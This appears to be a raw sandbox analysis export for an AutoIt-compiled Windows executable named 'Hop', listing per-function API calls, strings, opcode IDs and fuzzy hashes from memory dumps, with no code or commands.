                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ItemMenu$InfoWindow$CheckCountCtrlEnabledFocusLongMessagePostProcRadio
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2672075419-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 5de48b37807cf5e9572c5b55aff88bc579260c59b463e26447def2c6e42a81eb
                                                                                                                                                                                                                                                                                                          • Instruction ID: 795f6bd47959c17e1430282d9e12aeab43bf7eefcd37e3788b34edfc2f2b71c8
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5de48b37807cf5e9572c5b55aff88bc579260c59b463e26447def2c6e42a81eb
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17915E76F49616CAEB90CF66D4446BD33A1BF88BACF150039DE0E97696DE38E485C700
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C43780C: CreateFileW.KERNEL32 ref: 00007FF68C437876
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C4541D0: GetCurrentDirectoryW.KERNEL32(?,00007FF68C4399C7), ref: 00007FF68C4541EC
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C435A50: GetFullPathNameW.KERNEL32(?,00007FF68C435A3D,?,00007FF68C434C50,?,?,?,00007FF68C43109E), ref: 00007FF68C435A7B
                                                                                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32 ref: 00007FF68C439A60
                                                                                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32 ref: 00007FF68C439BA0
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
• Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CurrentDirectory$CreateFileFullNamePathwcscpy
                                                                                                                                                                                                                                                                                                          • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                                                                                                                                                                                                          • API String ID: 2207129308-3738523708
                                                                                                                                                                                                                                                                                                          • Opcode ID: da8776b3935f108f372e0f447b79be8c4908acda2ed79a75d128fc386c9bb0f4
                                                                                                                                                                                                                                                                                                          • Instruction ID: 4bd517193a4bc037ac5dc51fc5fa203012bbc8c99146d7f6d9c18d4e5388d3a5
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: da8776b3935f108f372e0f447b79be8c4908acda2ed79a75d128fc386c9bb0f4
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F4127122A18642C6EB10EB65D4405FE6770FFD479CF90413AEA8E87A9ADF7CD585CB00
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: DestroySendStringUninitializeUnregisterWindow
                                                                                                                                                                                                                                                                                                          • String ID: close all
                                                                                                                                                                                                                                                                                                          • API String ID: 1992507300-3243417748
                                                                                                                                                                                                                                                                                                          • Opcode ID: 5baaea7a998fb5a64be74ad77031d7567826fe4b93f306c701784b71cba838e4
                                                                                                                                                                                                                                                                                                          • Instruction ID: 517b8fb5c34b3fb3fd06b63ae5d221ebf36bec842ad23c168f846c47594ffd6c
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5baaea7a998fb5a64be74ad77031d7567826fe4b93f306c701784b71cba838e4
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 49D14022B09A06C1EE54DF26C5906BC6360BFD4B99F54403ADB0E97692DF3CE8E2D700
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$_NewEnum$get__NewEnum
                                                                                                                                                                                                                                                                                                          • API String ID: 0-1765764032
                                                                                                                                                                                                                                                                                                          • Opcode ID: 7e2a3d229f0fbfbb0bb3e4ac55cef0babde8bd6d800c2740a403695577890c75
                                                                                                                                                                                                                                                                                                          • Instruction ID: c1e6ab4c0ee87cf6a3f425a3c1aa82a8f73254b040844a9cb46857a2195b09ac
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e2a3d229f0fbfbb0bb3e4ac55cef0babde8bd6d800c2740a403695577890c75
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91A14A36A08B42C6EB20CF61E4445AD77A0FF88B98F55413ADA4E87B65DF3CE589C740
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$Window$CreateObjectStockwcscat
                                                                                                                                                                                                                                                                                                          • String ID: -----$SysListView32
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetSysColorBrush.USER32(?,?,?,?,?,?,?,?,?,00007FF68C433C7D,?,?,?,?,?,00007FF68C432BC1), ref: 00007FF68C433D06
                                                                                                                                                                                                                                                                                                          • LoadCursorW.USER32(?,?,?,?,?,?,?,?,?,00007FF68C433C7D,?,?,?,?,?,00007FF68C432BC1), ref: 00007FF68C433D16
                                                                                                                                                                                                                                                                                                          • LoadIconW.USER32(?,?,?,?,?,?,?,?,?,00007FF68C433C7D,?,?,?,?,?,00007FF68C432BC1), ref: 00007FF68C433D2B
                                                                                                                                                                                                                                                                                                          • LoadIconW.USER32(?,?,?,?,?,?,?,?,?,00007FF68C433C7D,?,?,?,?,?,00007FF68C432BC1), ref: 00007FF68C433D44
                                                                                                                                                                                                                                                                                                          • LoadIconW.USER32(?,?,?,?,?,?,?,?,?,00007FF68C433C7D,?,?,?,?,?,00007FF68C432BC1), ref: 00007FF68C433D5D
                                                                                                                                                                                                                                                                                                          • LoadImageW.USER32 ref: 00007FF68C433D89
                                                                                                                                                                                                                                                                                                          • RegisterClassExW.USER32 ref: 00007FF68C433DED
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C433EF8: GetSysColorBrush.USER32 ref: 00007FF68C433F4D
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C433EF8: RegisterClassExW.USER32 ref: 00007FF68C433F7E
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C433EF8: RegisterWindowMessageW.USER32 ref: 00007FF68C433F92
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C433EF8: InitCommonControlsEx.COMCTL32 ref: 00007FF68C433FB0
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C433EF8: ImageList_Create.COMCTL32 ref: 00007FF68C433FCB
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C433EF8: LoadIconW.USER32 ref: 00007FF68C433FE4
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C433EF8: ImageList_ReplaceIcon.COMCTL32 ref: 00007FF68C433FF7
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                                                                                                                                                          • String ID: AutoIt v3
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _get_daylight_invalid_parameter_noinfo$ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                                                                                          • String ID: ?
                                                                                                                                                                                                                                                                                                          • API String ID: 500310315-1684325040
                                                                                                                                                                                                                                                                                                          • Opcode ID: 685836145ac74aa4a2cd79fc47d922bc0e29f1722bd05d5705c662cecaadf47c
                                                                                                                                                                                                                                                                                                          • Instruction ID: 5de3768bfe2fcc77ca6750f9f8a41170fd8703e42066328fb604266a9e4e8d3d
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 685836145ac74aa4a2cd79fc47d922bc0e29f1722bd05d5705c662cecaadf47c
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D61A032A18646CAEB20DF25E9405B977B4FF84798F44023AEA4EC3A95DF3CE581D740
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageReleaseScreenSendText
                                                                                                                                                                                                                                                                                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                                                                                                                                                                                          • API String ID: 3721556410-2107944366
                                                                                                                                                                                                                                                                                                          • Opcode ID: d033586eeb8420df0584d02cad3e0ad78160aa9a1a2060901ffcbfff1dfca609
                                                                                                                                                                                                                                                                                                          • Instruction ID: 59baeb17799f10b5eaa19a8ee80af7fc39b589c632b9f575dfe8066c94d8623b
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d033586eeb8420df0584d02cad3e0ad78160aa9a1a2060901ffcbfff1dfca609
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80616C76A15A52C5EB40DF61E8909ED3760FF88B9CF51013AED1E93AA6DF38E585C300
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                                                                                                                                                                                          • String ID: 2$P
                                                                                                                                                                                                                                                                                                          • API String ID: 93392585-1110268094
                                                                                                                                                                                                                                                                                                          • Opcode ID: c4d75c7bed3dc32d74565b12e7beeeeebc4fd81d0a729176aca41e8b187ce2d2
                                                                                                                                                                                                                                                                                                          • Instruction ID: a8f6ceeb1c08e05cdec512f5fec84384a1fcce8d69267fdb369f28539a22e28f
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c4d75c7bed3dc32d74565b12e7beeeeebc4fd81d0a729176aca41e8b187ce2d2
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38518D32E04642C9F768CF6594402BD67A5BF84B9CF24813DDA5AA7694DFB8D4C7CB00
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: IconLoad_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                          • String ID: blank$info$question$stop$warning
                                                                                                                                                                                                                                                                                                          • API String ID: 4060274358-404129466
                                                                                                                                                                                                                                                                                                          • Opcode ID: b636dc1b51594c2af202ed54f4e4bdeb97e8f240ec4436fd1e847df07db7b1d4
                                                                                                                                                                                                                                                                                                          • Instruction ID: 268b06b0007dd300c8f7ed90b0adc667cb4e8fdba34a0e1420b9246f56a18eb6
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b636dc1b51594c2af202ed54f4e4bdeb97e8f240ec4436fd1e847df07db7b1d4
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 57216B31B0CB82C5FA25AB16A9011BA6251BF85798F44403DEE4DD779AEF7CE488C300
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: HandleLoadModuleString$Messagewprintf
                                                                                                                                                                                                                                                                                                          • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                                                                                                                                                          • API String ID: 4051287042-3128320259
                                                                                                                                                                                                                                                                                                          • Opcode ID: 02e40095ef40720f69863dbac7a2070404752031add831b0985804f9b4f72438
                                                                                                                                                                                                                                                                                                          • Instruction ID: c0d0c2195e39f595a4a860c2b56ac1f3ec359a873bd0ea6059780464889da069
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 02e40095ef40720f69863dbac7a2070404752031add831b0985804f9b4f72438
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 04115EB5B18B86D2D734CB24F445BEA2260FF88758F81043EE64E83A58DE7CD189C740
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
• Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
• Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1211466189-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: e1e2e441c9291e36cebb6767608181e9d23d9b0bd25b43b6ce96c6e1de2e754f
                                                                                                                                                                                                                                                                                                          • Instruction ID: d98fc38b97e3dd00164cbbb5f66b1051057114de9ca434ca73508c1c2b94126d
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e1e2e441c9291e36cebb6767608181e9d23d9b0bd25b43b6ce96c6e1de2e754f
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 15A1C266B18553C6E769CF25E544B7977A1FF84B58F125039DE0A83AA0DF3CE8A0C700
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ShowWindow
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1268545403-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 87c66640600301fc3614396531e44b743e01540278fec1b87f8964912ffd81f2
                                                                                                                                                                                                                                                                                                          • Instruction ID: e6df0d9e0469baa6db4c20b55bbdb248f590dba3f44d23bf1620d1d35089c754
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 87c66640600301fc3614396531e44b743e01540278fec1b87f8964912ffd81f2
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 51517B32E0C182CAFB659B29A45837D3692BF86B4CF185579C50ECB6B5CE6CA4C8C341
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3864802216-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 9674a36d8164cb560b58a036ea6f3e8bd8e6a73e44ede240e929598dcb41685d
                                                                                                                                                                                                                                                                                                          • Instruction ID: 6364efc9e8577816dd0c766e373b0b6b76035318070ced3763d2cd8590819055
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9674a36d8164cb560b58a036ea6f3e8bd8e6a73e44ede240e929598dcb41685d
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E41BC72A18681C7E764CF21A454B6ABBA0FB98BD5F154139EF8A83B54DF3CD480CB00
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 329cf7ad438edc5c76dcb0b9fad9cd181248692e257404cd766d6ec6700348b5
                                                                                                                                                                                                                                                                                                          • Instruction ID: 4e6660bd3986bc334eeaece1bb263038425c722b0abe9506244dd788dc5e8107
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 329cf7ad438edc5c76dcb0b9fad9cd181248692e257404cd766d6ec6700348b5
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EAC1F262A0978AC5FA648F15A40067E2BB1BF90B88F550139EA4E833D6CF3DE8C1D301
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • #77.OLEAUT32(?,?,00000001,00000000,00000001,?,00000000,00000047,?,00007FF68C4B0CA8,?,?,00000000,00007FF68C4C86CF), ref: 00007FF68C4B133B
                                                                                                                                                                                                                                                                                                          • #23.WSOCK32(?,?,00000001,00000000,00000001,?,00000000,00000047,?,00007FF68C4B0CA8,?,?,00000000,00007FF68C4C86CF), ref: 00007FF68C4B1391
                                                                                                                                                                                                                                                                                                          • #23.WSOCK32(?,?,00000001,00000000,00000001,?,00000000,00000047,?,00007FF68C4B0CA8,?,?,00000000,00007FF68C4C86CF), ref: 00007FF68C4B1478
                                                                                                                                                                                                                                                                                                          • #24.OLEAUT32(?,?,00000001,00000000,00000001,?,00000000,00000047,?,00007FF68C4B0CA8,?,?,00000000,00007FF68C4C86CF), ref: 00007FF68C4B149F
                                                                                                                                                                                                                                                                                                          • #23.WSOCK32(?,?,00000001,00000000,00000001,?,00000000,00000047,?,00007FF68C4B0CA8,?,?,00000000,00007FF68C4C86CF), ref: 00007FF68C4B14B0
                                                                                                                                                                                                                                                                                                          • #23.WSOCK32(?,?,00000001,00000000,00000001,?,00000000,00000047,?,00007FF68C4B0CA8,?,?,00000000,00007FF68C4C86CF), ref: 00007FF68C4B151E
                                                                                                                                                                                                                                                                                                          • #23.WSOCK32(?,?,00000001,00000000,00000001,?,00000000,00000047,?,00007FF68C4B0CA8,?,?,00000000,00007FF68C4C86CF), ref: 00007FF68C4B1593
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
• Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                          • Opcode ID: 2585bf9d99523b85a6387ebb36db1e93d42442dc18b734288afeab1606f91b78
                                                                                                                                                                                                                                                                                                          • Instruction ID: b21d3d3545c78290f6a02579401ec1e2a8e3aa101a80fe3740adadb7b02dfb05
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2585bf9d99523b85a6387ebb36db1e93d42442dc18b734288afeab1606f91b78
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FBA19722A18A12C6FB149BA5C5843BC67A0BF84B98F15513ADE0FD7696DF3CE481C340
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ObjectSelect$BeginCreatePath
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3225163088-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: d06d4cd1a423281fa7bfc3dd395589592d26c066c60ef58400709c52517d685a
                                                                                                                                                                                                                                                                                                          • Instruction ID: e5afdeb670069c5ef6205da06f001a874c506ba288440a1b8793a97edbdaf2c1
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d06d4cd1a423281fa7bfc3dd395589592d26c066c60ef58400709c52517d685a
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2A18E72A186C4C7D7748F19A400A6EBB75FBD5B98F144129EA8A53B69CF3CD482CF00
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSendWindow$Enabled
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3694350264-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: afb273491b6871b9358392d720659e4730aaef88e09809c522e030074b87f941
                                                                                                                                                                                                                                                                                                          • Instruction ID: 5d5677c1c27fae0ef160d1132ecce4b55362bca9ee8861c67a6c6cf8451eff2c
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: afb273491b6871b9358392d720659e4730aaef88e09809c522e030074b87f941
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C491A072E09646C6FB74DB55A5503B96391BF847B8F46403ACA6D83692CF3CE4D0E700
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 161812096-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 2e0c978de7f3949c5e4fef75b6087ee8ddd4ddcc90206a13e30e68fd27cedf73
                                                                                                                                                                                                                                                                                                          • Instruction ID: 665de8d5ee84cadd7c4ecddff3124b259fc72e589933146afe6fc8c7f9c2b842
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e0c978de7f3949c5e4fef75b6087ee8ddd4ddcc90206a13e30e68fd27cedf73
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C413736A05A45C5EB50DF62E8846AD37B1FF88B98F15403ADE0E97B64CF38E489C700
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                                                                                                                                                          • String ID: Msctls_Progress32
                                                                                                                                                                                                                                                                                                          • API String ID: 1025951953-3636473452
                                                                                                                                                                                                                                                                                                          • Opcode ID: 769d822a731d8b4ab9969762f95a8256fd4e8cf9c5dd72bf7c6db143b8f84875
                                                                                                                                                                                                                                                                                                          • Instruction ID: 5006a295386250b180ac8e9d7d855b6a2565bdfddaaf2c0510d727d3aea87fab
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 769d822a731d8b4ab9969762f95a8256fd4e8cf9c5dd72bf7c6db143b8f84875
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F311776A18681CAE360CF25B454B1AB661FB88794F109129EA9983F59CF3CD485CB40
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$Create$Show
                                                                                                                                                                                                                                                                                                          • String ID: AutoIt v3$d$edit
                                                                                                                                                                                                                                                                                                          • API String ID: 2813641753-2600919596
                                                                                                                                                                                                                                                                                                          • Opcode ID: 0ad88fc629bd0e984a014ea89d123ec5e352ad141f26ec72c70a003d1c95128a
                                                                                                                                                                                                                                                                                                          • Instruction ID: 48f3d865293d3fb1b1257ef962cab01ae64ab439bd80ff65ef83bfd8cd355cf6
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ad88fc629bd0e984a014ea89d123ec5e352ad141f26ec72c70a003d1c95128a
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8214A72A2CB41C7EB50CB14F89836977E0FB987A9F110238E68D86A54CFBDD094CB40
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3220332590-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 18d3220a09dc32d3d71dcb14d157741ee50ede115eaee0b264565a3d31b006b7
                                                                                                                                                                                                                                                                                                          • Instruction ID: 27bef40936f05652d3a4a6e04c3d99bab79d32cbdb4f2e6354c4d9b7be019caf
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 18d3220a09dc32d3d71dcb14d157741ee50ede115eaee0b264565a3d31b006b7
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C4A1E66AA28253C5E7288F758404BBD33A0FF44B5CF145139EE6AC7A94EF3DA881D310
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                          • String ID: f$p
                                                                                                                                                                                                                                                                                                          • API String ID: 3215553584-1290815066
                                                                                                                                                                                                                                                                                                          • Opcode ID: 14ccad43d37fd71aaa8e031f26cd0cf571f1f2d22f7e2fca84e2043b4fd9c4d9
                                                                                                                                                                                                                                                                                                          • Instruction ID: 323213d0522d5ea63b838f7ebac3d0d84d2e6cf7be877d24706cf03e2a779e2f
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14ccad43d37fd71aaa8e031f26cd0cf571f1f2d22f7e2fca84e2043b4fd9c4d9
